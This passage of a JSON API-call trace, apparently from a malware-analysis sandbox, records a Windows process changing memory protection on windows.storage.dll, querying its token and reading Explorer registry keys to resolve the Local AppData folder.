[ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 332 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 333 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 334 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "\\xc8\\x1b\\x19\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 335 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 336 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000120" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 337 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 338 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 339 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002c4" }, { "name": "ObjectAttributesName", "value": "{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" } ], "repeated": 0, "id": 340 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002c4" } ], "repeated": 0, "id": 341 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "Category" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "4" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Category" } ], "repeated": 0, "id": 342 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "Name" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "Local AppData" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Name" } ], "repeated": 0, "id": 343 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParentFolder" } ], "repeated": 0, "id": 344 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Description" } ], "repeated": 0, "id": 345 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "AppData\\Local" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\RelativePath" } ], "repeated": 0, "id": 346 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParsingName" } ], "repeated": 0, "id": 347 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InfoTip" } ], "repeated": 0, "id": 348 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalizedName" } ], "repeated": 0, "id": 349 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Icon" } ], "repeated": 0, "id": 350 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Security" } ], "repeated": 0, "id": 351 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResource" } ], "repeated": 0, "id": 352 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResourceType" } ], "repeated": 0, "id": 353 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalRedirectOnly" } ], "repeated": 0, "id": 354 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Roamable" } ], "repeated": 0, "id": 355 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PreCreate" } ], "repeated": 0, "id": 356 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Stream" } ], "repeated": 0, "id": 357 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PublishExpandedPath" } ], "repeated": 0, "id": 358 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\DefinitionFlags" } ], "repeated": 0, "id": 359 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "Attributes" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Attributes" } ], "repeated": 0, "id": 360 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\FolderTypeID" } ], "repeated": 0, "id": 361 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InitFolderHandler" } ], "repeated": 0, "id": 362 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 363 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 364 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002c8" }, { "name": "ObjectAttributesName", "value": "PropertyBag" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PropertyBag" } ], "repeated": 0, "id": 365 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002c8" } ], "repeated": 0, "id": 366 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 0, "id": 367 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xe4\\x17\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00D\\x18\\x19\\x00\\xdb\\x9e6s\\xa8cUs$\\xb6\\s\\xfc\\x91c\\x028\\xe9Ws\\x94\\x18\\x19\\x00\\x00\\x00\\x1a\\x00\\xe0\\xf5\\x19\\x00\\x04\\x18\\x19\\x00\\x02\\x00\\x00\\x00" } ], "repeated": 0, "id": 368 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c8" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 369 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 0, "id": 370 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002c4" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002c8" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" } ], "repeated": 0, "id": 371 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002cc" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002c4" }, { "name": "ObjectAttributesName", "value": "SessionInfo\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1" } ], "repeated": 0, "id": 372 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002cc" }, { "name": "ObjectAttributesName", "value": "KnownFolders" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\KnownFolders" } ], "repeated": 0, "id": 373 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002cc" } ], "repeated": 0, "id": 374 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xa4\\x19\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xfe\\xff\\xff\\xff$\\x1a\\x19\\x00\\x17\\xa0Ot\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&\\xa0Ot\\xbc\\xdcCtH\\x1a\\x19\\x00D\\x1a\\x19\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 375 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002cc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 376 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002cc" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" } ], "repeated": 0, "id": 377 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002cc" } ], "repeated": 0, "id": 378 }, { "timestamp": "2025-03-02 21:32:28,003", "thread_id": "4148", "caller": "0x00409093", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Local AppData" }, { "name": "Type", "value": "2", "pretty_value": "REG_EXPAND_SZ" }, { "name": "Information", "value": "%USERPROFILE%\\AppData\\Local" }, { "name": "FullName", "value": 